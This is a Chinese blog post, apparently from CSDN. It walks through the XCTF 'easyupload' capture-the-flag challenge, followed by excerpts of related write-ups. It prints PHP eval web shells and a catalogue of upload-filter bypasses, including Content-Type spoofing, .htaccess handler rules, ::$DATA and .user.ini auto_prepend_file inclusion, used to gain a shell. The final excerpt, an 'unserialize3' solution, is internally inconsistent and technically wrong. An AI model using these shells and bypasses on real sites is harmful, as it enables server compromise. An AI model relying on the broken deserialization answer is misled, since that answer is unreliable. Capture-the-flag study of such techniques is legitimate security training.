攻防世界easyupload (web新手)

最新推荐文章于 2025-02-25 11:48:37 发布
最新推荐文章于 2025-02-25 11:48:37 发布
阅读量6.8k 收藏 43
点赞数 14
分类专栏: 文件上传 攻防世界 WEB刷题记录 文章标签: 网络安全 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yuanxu8877/article/details/128071631
版权

文章目录

XCTF - easyupload


典型的文件上传,本题涉及知识点

  • 文件上传漏洞
  • .user.ini绕过

其实这个题目是文件上传漏洞中相对来说不是很常见的题目,说实话也是涉及了我的知识盲区,在此之前我对文件上传漏洞有一些总结如下,都尝试过后发现没有能用的。

文件上传漏洞前期总结

<?php eval($_POST['cmd']);?>
<?= eval($_POST[1]);?>
<script language="php">eval($_POST[1]);</script>

1. JavaScript 防御

检测发生在浏览器端(本地检测)

  1. 禁止JS
  2. 先改名后抓包最后改名改包
  3. 右键 复制图片地址
  4. 猜到链接

点击上传之后马上弹窗,

右键查看源码

  1. .jpg .png .jif 允许
  2. Php

2. Content-Type: text/php 进行检测非图片即禁止

  1. 抓包–上传
  2. 修改Content-Type,改为 image/jpeg

3. 上传名称后缀为.phtml .phps .php5 .pht

4. Apache .htaccess

  1. 创建 .htaccess
  2. 写入解析规则
  3. SetHandler application/x-httpd-php //所有文件都当作php执行
  4. AddType application/x-httpd-php .jpg //将.jpg文件当作php文件解析
  5. <FilesMatch “1.jpg”> SetHandler application/x-httpd-php //将包含1.jpg文件名
    的文件解析为php

5. windows空格绕过

- Windows系统不允许最后一个字符是空格之类的特殊符号
- 如果上传文件的最后一个字符是空格,会自动去掉

6. ::$DATA绕过

php+windows的情况下:如果文件名+“::$DATA”

  • 把::$DATA之后的数据当成文件流处理,不会检测后缀名
  • 保持"::$DATA"之前的文件名

7. 双写绕过 (phpphp)

.user.ini绕过

.user.ini中两个中的配置就是auto_prepend_fileauto_append_file。这两个配置的意思就是:我们指定一个文件(如1.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),相当于在index.php中插入一句:require(./1.jpg)。这两个设置的区别只是在于auto_prepend_file是在文件前插入,auto_append_file在文件最后插入。

利用.user.ini的前提是服务器开启了CGI或者FastCGI,并且上传文件的存储路径下有index.php可执行文件。
所以本题我们要想上传并且执行,首先上传.user.ini文件,然后上传一个图片。


注意:.user.ini在mac下是直接不显示的,所以这里我们直接创建一个1.user.ini,然后进行抓包改包即可。

上传过程中发现,被过滤了,肯定是文件的内容被检测到不是图片,我们将Content-Type修改为图片格式尝试一下:

修改Content-Type后,发现上传成功,接下来直接上传shell.jpg即可。直接创建一个一句话木马的txt。修改后缀为.jpg,

<?=eval($_POST['cmd']);?>


上传后发现依然被检测,仔细一看,文件头和content type对不起来,添加文件头尝试:

GIF89a
<?=eval($_REQUEST['cmd']);?>

在这里用其他版本的一句话容易被检测,测试了好几次发现这个比较好用,此时我们需要用到另一个知识点:.user.inishell.jpg同一目录下的所有php文件都会包含shell.jpg文件。这样就很好办了,我们看看uploads文件夹下是否有php文件,再次上传一个正常图片后,发现跳转网页中有/uploads/index.php

运用仪剑进行连接

此时一定要注意,连接的地址为xxx/uploads/index.php

在根目录下发现flag。


其实在这里我们就比较好理解了,我们首先上传.user.ini的目的是本目录下所制定的文件被php文件所包含,其实相当于三个文件必须同时存在才会满足这个条件。

网络安全 | CTF】攻防世界 easyupload 解题详析
等风来
07-31 1万+
抓包改后缀,.php1~.php9、.htaccess均被过滤(.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中,用来为该目录及其子目录提供特定的配置指令):提示:只要是运用了fastcgi的服务器都能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。
web | CTF】攻防世界 easyupload
weixin_46301214的博客
01-31 905
天命:好像也不太easy首先判断只能上传图片格式的话,那只能通过其他漏洞来把图片解析成php才能构成漏洞了看了一下别人wp,原来是利用php的配置文件来实现漏洞攻击php的 user.ini 配置文件里,有一个参数是在文件运行前把某个文件包含进来的我们只需要做一个局部配置文件,即可触发效果然后上传图片,把图片包含进来即可就相当于触发了文件包含漏洞。
攻防世界】CTF 网络安全学习 easyupload_攻防世界easyupload
2401_84263282的博客
06-25 843
做这个题目前前后后一共花了五天的时间,因为本身不是一直有空,这道题首先要预先处理的问题很多。1. 先安装好中国蚁剑,教程整理如下,kali 零基础安装中国蚁剑2. 理解 **.user.ini**文件.user.ini 文件通常是与 PHP 配置相关的文件。在 PHP 应用程序中,用户可以通过 .user.ini 文件来自定义一些 PHP 的配置选项,以适应特定的应用需求。以下是一些关键点:位置: .user.ini 文件通常位于用户的网站目录下,可以影响到该目录及其子目录下的 PHP 执行环境。
攻防世界WEB新手模式)15-easyupload
最新发布
你好
02-25 668
那么和.user.ini和a.jpg同一目录下的所有php文件都会包含a.jpg文件。接着尝试在构造时加上GIF89a(图片文件头)--一定是短标签+图片文件头。更改文件类型后,点击发送,则上传成功。但可以看出过滤成功,那就尝试在抓包过程中改成php后缀文件。而在这道题目中我们需要加上图片头GIF89a,所以。加上图片头之后可以上传成功,但是蚁剑无法连接。打开题目是一个很明显的上传点,一句话木马尝试。例如在.user.ini文件中写入。首先上传.user.ini文件。全部上传成功过后,蚁剑连接。
攻防世界WEB练习-easyupload
墨鱼菜鸡
09-10 4451
目录 题目场景 查看源码 官方WriteUp BP抓包 F12查看文件去向 蚁剑连接 找到flag 题目场景 查看源码 毫无有效的数据 官方WriteUp 本题需要利用文件上传漏洞点,通过绕过服务器的安全防护,达到getshell的目的 本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行 这里...
攻防世界Web easyupload
DG_s1mple
12-30 1033
本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行关于.user.ini文件是怎么利用的,可以非常详细,我这里截取一段.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR、PHP_INI_USER”的设置。而且,和php.ini不同的是,.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,
easyupload(攻防世界)
热门推荐
m0_56107268的博客
11-15 1万+
.user.ini 学习
攻防世界web-----easyupload
2201_75556700的博客
01-02 903
这道题对小白的我来说还是很难的,做出这道题我也是看了很多的解答后自己重新试了一遍(我是在window下进行的,在kali稍微有点不一样,就是那个.user.ini得改为user.ini之后再在抓包那里修改为.user.ini就好了(就是第二步))之所以有点不一样是因为kali中"."开头会隐藏。1.首先我们需要上传两个文件,一个是.user.ini另一个是a.jpg(a可以随意命名)2.接下来先上传.user.ini文件之后用burp抓包。3.然后再上传a.jpg文件。.user.ini的内容为。
攻防世界easyupload题解与user.ini的前世今生[DOGE]
m0_66935689的博客
10-04 345
哟呵,没上传成功还返回了一个英语句子,用我练习时长两年半的工地英语浅浅翻译一下,大概意思是“你的文件糟糕极了”说实话我也有被我自己的英语水平震撼到[doge]发现多了一个“index.php”即http://xxxxx/uploads/index.php盲猜传这去了。没连上,在看官方的writeup时了解到了一个东西,也是今天的主角——.user.ini。既然后缀是图片也过不去,推测出应该是对文件内容进行了检查。这道题也是有点意思的,坑也有点多,但能学到的东西也还行。看到了文件头,进一步证实了我的猜想。
CTF-WEB攻防世界题目实战解析easyupload
2301_76565920的博客
04-23 2377
题目:easyupload 难度:1知识点:上传漏洞,服务器防护绕过,后门,.user.ini,auto_prepend_file的使用
攻防世界-web-easyupload
wuh2333的博客
04-09 1190
攻防世界,文件上传
攻防世界--WEB--easyupload
m0_65766842的博客
03-30 411
但是更改了文件头之后上传后,用蚁剑链接之后并没有什么可用的信息,思路到此开始断了,我们查询做题方法,发现这题是要用到.user.ini的绕过我们去寻找.user.ini染过的方法。我们首先构造出.user.ini文件,因为我们刚刚发现是要上传一张图片的类型,所以我们加上文件头。因为我们这个不是真的jpg文件,所以我们使用bp抓包来着更改识别项。连接成功之后,我们在根目录下发现了flag文件,打开得到flag。此时我们再次上传一句话木马,我们依旧加上文件头,伪装成图片。先传user.ini再传a.jpg。
攻防世界--easyupload
qq_73611185的博客
09-16 1036
php文件发现网页设置了文件类型检测,修改文件后缀为jpg依然无效,第二步,尝试去burpsuite改包,将一句话木马文件上传后的cotent-type改为image/jpg,然后放包,仍然无法上传成功(burpsuite改包之后把拦截请求关了就是放包)然后同理第二步,上传成功之后再上传一个jpg文件(命名与上面的jpg文件保持一致否则会导致连接失败),文件内容为:(没有结尾那个v,懒得删除了)还有一个不能上传文件成功的原因很离谱就是:不能使用校园网进行上传(学生党的痛)成为ctf全栈之路之web第十题。
Easyupload攻防世界
xyh000001的博客
06-30 784
然后就可以开始找flag,当然你也可以一开始就把muma.jpg里的代码改成cat,直接抓取flag,还省的自己找。把Content-Type: application/octet-stream改成。我打/直接拉到最下面有flag点进去就是答案了。上传a.jpg这样才算成功(如图)。1.新建.user.ini文件。用蚁剑连接(每个人的都不一样)上传上面的文件用BURP抓包。新建a.txt文件,内容为。保存后把文件名改成.jpg。F12打开网络找到网址。
[攻防世界] easyupload
m0_75178803的博客
04-02 720
首先准备 .user.ini 文件和a.jpg文件。首先上传.user.ini文件,然后进行抓包。1.[攻防世界] easyupload。用蚁剑连接该页面,连接密码为木马密码。.user.ini 文件上传成功。此时再将a.jpg文件上传成功。在根目录下得到flag。
攻防世界easyupload
小缪的博客
06-10 4234
知识点:文件上传漏洞。
攻防世界easyupload
m0_73303597的博客
11-10 531
自用
攻防世界 easyupload
rev1ve的博客
03-09 822
ctf攻防世界 easyupload web
攻防世界web新手题unserialize3
05-05
这道题是一个 PHP 反序列化的题目。 题目描述: 提示:这次不会那么简单了,打开源代码看看? 源代码: ``` <?php error_reporting(0); highlight_file(__FILE__); class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show('flag','0'); $this->data = file_get_contents('/flag'); } public function __destruct(){ if(preg_match('/show|flag|_|\s|\(|\)|{|}|\'|\"/i',$this->show)){ exit('hacker!'); } echo $this->show." is ".$this->data; } } if(isset($_GET['a'])){ $a = unserialize($_GET['a']); if($a instanceof Flag){ echo $a; } } ``` 分析: 首先看到这是一个传入参数进行反序列化的题目,传入参数为 $_GET['a'],并且在反序列化后判断其类型是否为 Flag,如果是则输出 $a。 在 Flag 类的构造函数中有一个 $this->data = file_get_contents('/flag'),意味着我们需要获取服务器上的 /flag 文件。 而在 Flag 类的析构函数中,会对 $this->show 变量进行正则匹配,匹配的正则表达式为 /show|flag|_|\s|\(|\)|{|}|\'|\"/i,如果匹配到就会输出 'hacker!'。这里需要注意的是,$this->show 的值是 Show 类的一个实例,而 Show 类中的 __toString() 方法返回的是 $this->name 的值。 因此,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 解法: 根据题目分析,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 我们可以通过手动构造序列化字符串来实现这个目标。首先构造一个 Show 类的实例,该实例的 $name 值为一个正则表达式的匹配条件,然后将该实例作为 Flag 类的一个属性,最后将 Flag 类序列化即可。 构造序列化字符串的代码如下: ``` <?php class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show('/show|flag|_|\s|\(|\)|{|}|\'|\"/i','0'); $this->data = file_get_contents('/flag'); } public function __destruct(){ if(preg_match('/show|flag|_|\s|\(|\)|{|}|\'|\"/i',$this->show)){ exit('hacker!'); } echo $this->show." is ".$this->data; } } // 序列化 Flag 类 $flag = new Flag(); $ser = serialize($flag); echo urlencode($ser); ``` 将上述代码保存为文件 unserialize3.php 并上传到服务器上,然后访问 http://your-ip/unserialize3.php,得到序列化后的字符串: ``` O:4:"Flag":2:{s:4:"show";O:4:"Show":2:{s:4:"name";s:23:"/show|flag|_|\s|\(|\)|{|}|'|\i";s:3:"age";s:1:"0";}s:4:"data";s:45:"flag{3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07}";} ``` 最后将序列化后的字符串作为 $_GET['a'] 的值传入即可,访问 http://your-ip/unserialize3.php?a=O%3A4%3A%22Flag%22%3A2%3A%7Bs%3A4%3A%22show%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A23%3A%22%2Fshow%7Cflag%7C_%7C%5Cs%7C%5C(%5C)%7B%7D%7C%27%7C%5C%22%5Ci%22%3Bs%3A3%3A%22age%22%3Bs%3A1%3A%220%22%3B%7Ds%3A4%3A%22data%22%3Bs%3A45%3A%22flag%7B3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07%7D%22%3B%7D,即可得到 flag。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值